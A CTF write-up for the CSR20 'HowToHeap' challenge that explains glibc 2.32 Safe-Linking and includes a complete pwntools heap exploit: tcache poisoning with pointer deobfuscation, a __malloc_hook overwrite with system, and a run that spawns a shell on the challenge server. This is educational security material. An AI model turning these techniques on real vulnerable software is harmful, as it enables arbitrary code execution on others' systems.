[CSR20] HowToHeap - Libc 2.32 | Fascinating Confusion

Sun 01 November 2020
ctf
Galile0
ctf safelinking tcache 2.32 pwn heap csr20

HowToHeap was a medium rated challenge during the CyberSecurityRumble 2020 (CSR20) CTF. While not particular difficult, it allowed players to explore a new concept introduced with Libc 2.32: Safe-Linking.

In this writeup we will not only solve a CTF-Challenge, but also take a look at what at this new mitigation technique introduced in the latest glibc.

Remark on my inefficiency

The solution shown in this writeup is not the shortest. You can avoid quite a few steps shown here, if you just want to get that sweet shell. The point of this writeup is to show how the new glibc hardening for single-linked lists work.

Starting out as usual we download the challenge files. We get a convenient docker-setup from which we can pull the libc.so.6 , as well as the ld.so file. We also get the challenge binary (duh!) and the source (nice!). Doing our usual challenge prep:

❯ file libc-2.32.so
libc-2.32.so: ELF 64-bit LSB shared object, x86-64, version 1 (GNU/Linux), dynamically linked, interpreter /usr/lib/ld-linux-x86-64.so.2, BuildID[sha1]=f45b67ab28af1581cba8e4713e0fd3b2bc004b2e, for GNU/Linux 3.2.0, not stripped
❯ checksec howtoheap
[*] '/home/galile0/ctf/csr20/howtoheap'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled

All protections are enabled, but that shouldn't bother us too much, considering we are facing a heap challenge. Next up:

Source Review

void malloc_one() {
    uint16_t index;
    size_t size;

    printf("malloc at index: ");
    if (fscanf(stdin, "%hu", &index) != 1)
    fail("could not read index");

    if (index >= MAX_ALLOCATIONS)
        fail("index oob");

    if (allocations[index])
        fail("index already occupied");

    printf("with size: ");
    if (fscanf(stdin, "%lu", &size) != 1)
        fail("could not read size");

    allocations[index] = malloc(size);
    if (!allocations[index])
        fail("could not allocate memory");
}

void free_one() {
    uint16_t index;

    printf("free at index: ");
    if (fscanf(stdin, "%hu", &index) != 1)
        fail("could not read index");

    if (index >= MAX_ALLOCATIONS)
        fail("index oob");

    if (!allocations[index])
        fail("calling free on a nullptr");

    free(allocations[index]);
    allocations[index] = NULL;
}

void read_one() {
    uint16_t index;
    size_t size;

    printf("read at index: ");
    if (fscanf(stdin, "%hu", &index) != 1)
        fail("could not read index");

    if (index >= MAX_ALLOCATIONS)
        fail("index oob");

    if (!allocations[index])
        fail("calling read on a nullptr");

    printf("of size: ");
    if (fscanf(stdin, "%lu", &size) != 1)
        fail("could not read size");

    if (write(STDOUT_FILENO, allocations[index], size) != size)
        fail("read failed");
}

void write_one() {
    uint16_t index;
    size_t size;

    printf("write to index: ");
    if (fscanf(stdin, "%hu", &index) != 1)
        fail("could not read index");

    if (index >= MAX_ALLOCATIONS)
        fail("index oob");

    if (!allocations[index])
        fail("calling write on a nullptr");

    printf("of size: ");
    if (fscanf(stdin, "%lu", &size) != 1)
        fail("could not read size");

    if (read(STDIN_FILENO, allocations[index], size) != size)
        fail("write failed");
}

int main() {
    setvbuf(stdin, 0, _IONBF, 0);
    setvbuf(stdout, 0, _IONBF, 0);
    setvbuf(stderr, 0, _IONBF, 0);

    printf("how-to-heap\n> 0 => exit\n> 1 => malloc\n> 2 => free\n> 3 => read\n> 4 => write\n");
    for(;;) {
        uint8_t option;

            printf("> ");
        if (fscanf(stdin, "%hhu", &option) != 1)
                fail("could not read menu option");

        switch(option) {
            case 0: return 0;
                case 1: malloc_one(); break;
            case 2: free_one(); break;
            case 3: read_one(); break;
            case 4: write_one(); break;
            default: fail("invalid option");
        }
    }
}

Well shit. If this isn't a textbook heap playground. In case you can't be bothered to read the source (I feel you). We can:

Have up to 0x400 Chunks allocated at the same time
Allocate whatever size we want
Read an arbitrary amount of data from a chunk (even out of bounds)
Write arbitrary amount of data into a chunk (also out of bounds)
No UAF or whatever bugs, but who cares

This basically gives us complete control over the heap, without having to abuse any arcane bugs.

Exploit Draft

To get going, I start with my usual template based on pwntools (All new and shiny in python 3) and just add the functions to interact with the binary:

#!/usr/bin/env python3
from pwn import *

#convenience Functions
convert = lambda x                  :x if type(x)==bytes else str(x).encode()
s       = lambda data               :io.send(convert(data))
sl      = lambda data               :io.sendline(convert(data))
sla     = lambda delim,data         :io.sendlineafter(convert(delim), convert(data), timeout=context.timeout)
ru      = lambda delims, drop=True  :io.recvuntil(delims, drop, timeout=context.timeout)
uu32    = lambda data               :u32(data.ljust(4, b'\x00'))
uu64    = lambda data               :u64(data.ljust(8, b'\x00'))

# Exploit configs
binary = ELF('howtoheap')
host = 'chal.cybersecurityrumble.de'
port = 8263
local_libc = ELF('/usr/lib/x86_64-linux-gnu/libc-2.31.so', checksec=False)
remote_libc = ELF('./libc-2.32.so', checksec=False)
ld = ELF('./ld-2.32.so', checksec=False)

def launch_gdb(breakpoints=[], cmds=[]):
    if args.NOPTRACE:
        return
    info("Attaching Debugger")
    cmds.append('handle SIGALRM ignore')
    for b in breakpoints:
        cmds.insert(0,'b *' + str(binary.address + b))
    gdb.attach(io, gdbscript='\n'.join(cmds))

def add(idx, size):
    sl(1)
    sla(': ', idx)
    sla(': ', size)
    return ru('>')

def remove(idx):
    sl(2)
    sla(': ', idx)
    return ru('>')

def show(idx,size):
    sl(3)
    sla(': ', idx)
    sla(': ', size)
    return ru('>')

def write(idx, size, data):
    sl(4)
    sla(': ', idx)
    sla(': ', size)
    s(data)
    return ru('>')

if __name__ == '__main__':
    # call with DEBUG to change log level
    # call with NOPTRACE to skip gdb attach
    # call with REMOTE to run against live target
    one_gadget = [0xcda5a, 0xcda5d, 0xcda60]
    if args.REMOTE:
        args.NOPTRACE = True # disable gdb when working remote
        io = remote(host, port)
        libc = remote_libc
    else:
        io = process([ld.path, binary.path], env={'LD_PRELOAD': remote_libc.path})
        libc = remote_libc
    if not args.REMOTE:
        for mmap in open('/proc/{}/maps'.format(io.pid),"rb").readlines():
            mmap = mmap.decode()
            if binary.path.split('/')[-1] == mmap.split('/')[-1][:-1]:
                binary.address = int(mmap.split('-')[0],16)
                break

    io.interactive()

This script has some benefits for us: We can easily start a debugger and set breakpoints, even though the binary has PIE enabled. Going from here we will just add stuff to the bottom of the script. But what do we want to add anyway? Well, since we can read and write basically where ever we want, the easiest will be an attack on the tcache fd since this has the least amount of security checks. To do so, we need some chunks and leaks

Exploitation

Getting some leaks is easy. We have no UAF, but we can read out of bounds. Basically we add 2 Chunks, free the second, and read from the first with a size that also prints the header of the second chunk. While we are at it, lets also add a third chunk that's big enough to be out of TCache range, so that we can get some Libc leaks.

add(0, 0x28) # Reference Chunk
add(1, 0x28) # We will overwrite FD here
add(2, 0x28) # Dummy chunk for illustration purpose
add(3, 0x800) # To get some LIBC-Leaks
add(4, 0x28) # Block against wilderness

remove(2) # again, illustration :D
remove(1) # Populate FD
remove(3) # Populate FD/BK with LIBC

Now, lets inspect the heap and see what we got:

c = [
'file howtoheap',
'set $alloc=0x40c0+{}'.format(binary.address),
]

# Break at print_menu
launch_gdb(breakpoints=[0x1156], cmds=c)

We can simply use x/4gx $alloc to see the list of allocated chunks. I use this trick since GDB can be somewhat picky with debug symbols in a PIE binary using a preloaded glibc and ld.so (Complains about missing symbols everywhere). We see the following chunks:

You can see the four chunks highlighted. But something seems off, doesn't it? And that's not only why I added a dummy chunk , but also why I wrote up this article in the first place. The FD of chunk2 is all messed up! Time to take a detour into:

Safe-Linking

Getting to the core of the challenge, this is why we are here. Libc 2.32 introduced a new mitigation called Safe-Linking. You can (and in fact should) read about it here. Basically, the idea is that pointers get obfuscated by XORing them with the address they are storred at shifted by 12 bits. The following image from the article shows this quite well:

In this image, P is the FD pointer, and L is the address where it's stored at. Since the memory address is partially random, and we can't know it, we can't get the original pointer back, right? Well let's take a closer look.

We can easily see in the image that the first three nibbles (0xBA9 ) are not randomized. This is simply due to a shift of 12 bits to the left, so those values are xored with 0. Coolio. The next two nibbles (0x87 of P ) are xored with the first two (0xBA ) which we know, cause they are still contained in the pointer P' . So we can reasonable recover the first 5 nibbles already. Now that we have 5 nibbles (0xBA987 ) of the original pointer P , we can take a look at the image again, and find that 0x98 is xored onto 0x65 of P giving us the next part of the obfuscated pointer. Since xor can easily be reversed, we can basically reverse this obfuscations starting with the 3 known nibbles and going in 4 bit chunks until we have a clear pointer again. To illustrate this, let's take the obfuscated Pointer P' and recover it step by step. We simply start with what we know:

P'     = 0x0000BA93DFD35753
L>>12  = 0x0000000BA9XXX???
XOR------------------------
P      = 0x0000BA9XXX??????

As described, the first 3 nibbles of P are the same as for P' . Now, the next 3 nibbles, marked as X can be calculated with an XOR. Doing so gives us:

P'     = 0x0000BA93DFD35753
L>>12  = 0x0000000BA9876XXX
XOR------------------------
P      = 0x0000BA9876XXX???

We can continue this, and calculate another 3 nibbles:

P'     = 0x0000BA93DFD35753
L>>12  = 0x0000000BA9876543
XOR------------------------
P      = 0x0000BA9876543???

Recovering the final three nibbles is up to the reader :).

Implementing this in python looks like this:

def defuscate(x,l=64):
    p = 0
    for i in range(l*4,0,-4): # 16 nibble
        v1 = (x & (0xf << i )) >> i
        v2 = (p & (0xf << i+12 )) >> i+12
        p |= (v1 ^ v2) << i
    return p

def obfuscate(p, adr):
    return p^(adr>>12)

With this, we can easily de-obfuscate any leaks. Now, this would not be necessary for this challenge since we can also get a heap leak from the tcache_per_thread struct address. This works because safe-linking is only designed to protect single linked lists, and therefor is only applied to the FD pointer of fastbins and tcaches. But we absolutely need to obfuscate any FD we overwrite, i.e. overwriting fd with a plain address to __malloc_hook won't work. So in addition to a libc-leak we now also need a heap leak for attacks on tcache or fastbins. The pointer obfuscation is pretty useless though (for ctfs anyway). Also note that it is not applied on our UnsortedChunk of size 0x811 since this is not a single linked list and therefore not affected by this mitigation.

A useless mitigation?

Does that mean this new mitigation useless? Far from it! In CTF scenarios it isn't too bad since you most likely can get a leak anyway. And given some leak, you can always deobfuscate the pointer and calculate any heap address you may need as an offset. But it mitigates some leakless techniques that rely on overwriting e.g. just the least significant byte. So in real-world scenarios this might add some protection, while in CTFs it's more of a nuisance.

Another mitigation they introduced is, that chunks in a single linked list have to be aligned to 0x10 boundaries. So no more abusing that address starting with 0x7f for you fastbin dup exploit. This sucks, but we can just use tcaches which don't care about the size field.

Moving on

Now that we can de-obfuscate pointers and know how this new mitigation works, lets continue by getting some leaks. For this we can just read from the first chunk with enough bytes to dump the whole heap. And while we are at it, lets add some one_gadgets , you know the drill:

leak = show(0, 0x1b8)
leak = show(0, 0x98)
heap_chunk1 = defuscate( uu64( leak[0x30:0x38] ) )
libc.address = uu64(leak[0x90:0x98])-0x1c2a60
success("Chunk1     @   0x{:012x}".format(heap_chunk1))
success("LIBC       @   0x{:012x}".format(libc.address))
success("MHook      @   0x{:012x}".format(libc.symbols['__malloc_hook']))
one_g = libc.address + one_gadget[0]

Neat, that worked. Also note: The value of heap_chunk1 is the address of heap_chunk2 since this is the next free chunk. But when we overwrite the FD of chunk1 we actually need to xor it with the address of chunk1, not chunk2. But having the address of chunk2 allows us to calculate the address of chunk1 since the offset is fixed.

Overwrite malloc_hook

Since we can write arbitrary amounts of data, we just write into chunk0 and write out of bounds into the fd of chunk2. After we've done that, we can play the usual game of requesting our tcaches back to get a chunk at __ malloc_hook . Then we write the one_gadget there and done. Easy enough, let's go:

# Overwrite Malloc Hook
p = b''
p += b'A'*0x28
p += p64(0x31) # Size field
p += p64(obfuscate(libc.symbols['__malloc_hook'], heap_chunk1-0x30))
write(0, len(p), p)

add(1, 0x28) # Use up chunk
add(2, 0x28) # This is the chosen one

write(2, 8, p64(one_g)) # Overwrite malloc Hook

And now if we trigger another malloc:

./writeup.py NOPTRACE
[*] '/home/galile0/ctf/csr20/howtoheap'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Starting local process '/home/galile0/ctf/csr20/howtoheap/ld-2.32.so': pid 298893
[+] Chunk1     @   0x7ffff7fff300
[+] LIBC       @   0x7ffff7df8000
[+] MHook      @   0x7ffff7fba9f0
[*] Attaching Debugger
[!] Skipping debug attach since context.noptrace==True
[*] Switching to interactive mode
$ 1
malloc at index: $ 9
with size: $ 1
[*] Got EOF while reading in interactive
$
[*] Process '/home/galile0/ctf/csr20/howtoheap/ld-2.32.so' stopped with exit code -11 (SIGSEGV) (pid 298893)
[*] Got EOF while sending in interactive

Well shit. But we have more gadgets to try, right? WRONG! Turns out none of the one_gadgets work. Well, fuck

Actually executing code

This was somewhat irritating at first, but there are other ways. We could for example try to leak the binary or stack address and ROP around. Or, we can just call system ¯_(ツ)_/¯.

And we can conveniently store our /bin/sh string on the heap at a known address. The question is how do we get the pointer to that address passed to system called by the __malloc_hook . Well the __malloc_hook is actually designed for debugging, and so get's passed the same argument as malloc . And this argument is of course the size we want to allocate. And since we have no size limitation, who stops us from passing a pointer value as a size parameter? So, our new plan:

Overwrite malloc_hook with System
Write /bin/sh into Chunk0
pass the address of Chunk0 as a size parameter to malloc
???
Profit

Making some adjustments to our script, the finished exploit looks like this:

#!/usr/bin/env python3
from pwn import *

#convenience Functions
convert = lambda x                  :x if type(x)==bytes else str(x).encode()
s       = lambda data               :io.send(convert(data))
sl      = lambda data               :io.sendline(convert(data))
sla     = lambda delim,data         :io.sendlineafter(convert(delim), convert(data), timeout=context.timeout)
ru      = lambda delims, drop=True  :io.recvuntil(delims, drop, timeout=context.timeout)
uu32    = lambda data               :u32(data.ljust(4, b'\x00'))
uu64    = lambda data               :u64(data.ljust(8, b'\x00'))

# Exploit configs
binary = ELF('howtoheap')
host = 'chal.cybersecurityrumble.de'
port = 8263
local_libc = ELF('/usr/lib/x86_64-linux-gnu/libc-2.31.so', checksec=False)
remote_libc = ELF('./libc-2.32.so', checksec=False)
ld = ELF('./ld-2.32.so', checksec=False)

def launch_gdb(breakpoints=[], cmds=[]):
    if args.NOPTRACE:
        return
    info("Attaching Debugger")
    context.terminal = ['tilix', '-a', 'session-add-right', '-e']
    cmds.append('handle SIGALRM ignore')
    for b in breakpoints:
        cmds.insert(0,'b *' + str(binary.address + b))
    gdb.attach(io, gdbscript='\n'.join(cmds))

def add(idx, size):
    sl(1)
    sla(': ', idx)
    sla(': ', size)
    return ru('>')

def remove(idx):
    sl(2)
    sla(': ', idx)
    return ru('>')

def show(idx,size):
    sl(3)
    sla(': ', idx)
    sla(': ', size)
    return ru('>')

def write(idx, size, data):
    sl(4)
    sla(': ', idx)
    sla(': ', size)
    s(data)
    return ru('>')

def defuscate(x,l=64):
    p = 0
    for i in range(l*4,0,-4): # 16 nibble
        v1 = (x & (0xf << i )) >> i
        v2 = (p & (0xf << i+12 )) >> i+12
        p |= (v1 ^ v2) << i
    return p

def obfuscate(p, adr):
    return p^(adr>>12)

if __name__ == '__main__':
    # call with DEBUG to change log level
    # call with NOPTRACE to skip gdb attach
    # call with REMOTE to run against live target
    if args.REMOTE:
        args.NOPTRACE = True # disable gdb when working remote
        io = remote(host, port)
        libc = remote_libc
    else:
        io = process([ld.path, binary.path], env={'LD_PRELOAD': remote_libc.path})
        libc = remote_libc
    if not args.REMOTE:
        for mmap in open('/proc/{}/maps'.format(io.pid),"rb").readlines():
            mmap = mmap.decode()
            if binary.path.split('/')[-1] == mmap.split('/')[-1][:-1]:
                binary.address = int(mmap.split('-')[0],16)
                break
    c = [
    'file howtoheap',
    'set $alloc=0x40c0+{}'.format(binary.address),
    ]
    # Prepare Heap
    add(0, 0x28) # Reference Chunk
    add(1, 0x28) # We will overwrite FD here
    add(2, 0x28) # Dummy chunk not actually needed
    add(3, 0x800) # To get some LIBC-Leaks
    add(4, 0x28) # Block against wilderness

    # Get some Pointer
    remove(2)
    remove(1) # Populate FD
    remove(3) # Populate FD/BK with LIBC

    # Get some leaks
    leak = show(0, 0x98)
    heap_chunk1 = defuscate( uu64( leak[0x30:0x38] ) )
    libc.address = uu64(leak[0x90:0x98])-0x1c2a60
    success("Chunk1     @   0x{:012x}".format(heap_chunk1))
    success("LIBC       @   0x{:012x}".format(libc.address))
    success("MHook      @   0x{:012x}".format(libc.symbols['__malloc_hook']))

    # Overwrite Malloc Hook
    p = b''
    p += b'/bin/sh\x00'
    p += b'A'*0x20
    p += p64(0x31) # Size field
    p += p64(obfuscate(libc.symbols['__malloc_hook'], heap_chunk1-0x30))
    write(0, len(p), p)
    add(1, 0x28) # Use up chunk
    add(2, 0x28) # This is the chosen one
    write(2, 8, p64(libc.symbols['system']))

    launch_gdb(breakpoints=[0x1156], cmds=c) # Break at print_menu

    # Trigger exploit
    sl(1)
    sl(3)
    sl(heap_chunk1-0x60)


    success('Enjoy your Shell')
    sl('id')
    io.interactive()

And running it of course:

❯ ./writeup.py REMOTE
[*] '/home/galile0/ctf/csr20/howtoheap'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    Canary found
    NX:       NX enabled
    PIE:      PIE enabled
[+] Opening connection to chal.cybersecurityrumble.de on port 8263: Done
[+] Chunk1     @   0x5624ac725300
[+] LIBC       @   0x7f5bbeb98000
[+] MHook      @   0x7f5bbed5a9f0
[+] Enjoy your Shell
[*] Switching to interactive mode
malloc at index: with size: uid=1000(ctf) gid=1000(ctf) groups=1000(ctf)
$ ls /home/ctf
flag.txt
howtoheap

Neat!

Your hook to free(dom)

After the ctf, and seeing other solutions I realized that overwriting the __free_hook would have been just as easy. We could've written /bin/sh to an allocated chunk and then call free on it. But my brain is somewhat stuck at overwriting the __malloc_hook because I've done it so many times with fastbins that I just don't even look at the __free_hook :D

Lessons learned

This challenge was actually quite easy since there were absolutely no restrictions in place. But this allowed us to learn something about the new mitigation in Libc-2.32, called safe-linking. We learned that while safe-linking protects single linked lists, it does nothing for other types of chunks. We also saw how we can easily deobfuscate a leaked pointer, abusing the fact that the xored address is shifted 12 bits before it's xored.

Unfortunately, this wouldn't even have been necessary for solving the challenge since leaking the tcache_per_thread pointer would have been enough to calculate everything else. But I wanted to take this as an opportunity to show, how to bypass this obfuscation, in case you need it for a future ctf (hint: you will). Overall, it was a fun challenge, and even more important: A nice playground to get started in heap exploitation. I hope this writeup was understandable and you learned something following it. If you have any questions or find some errors, you can find me on Twitter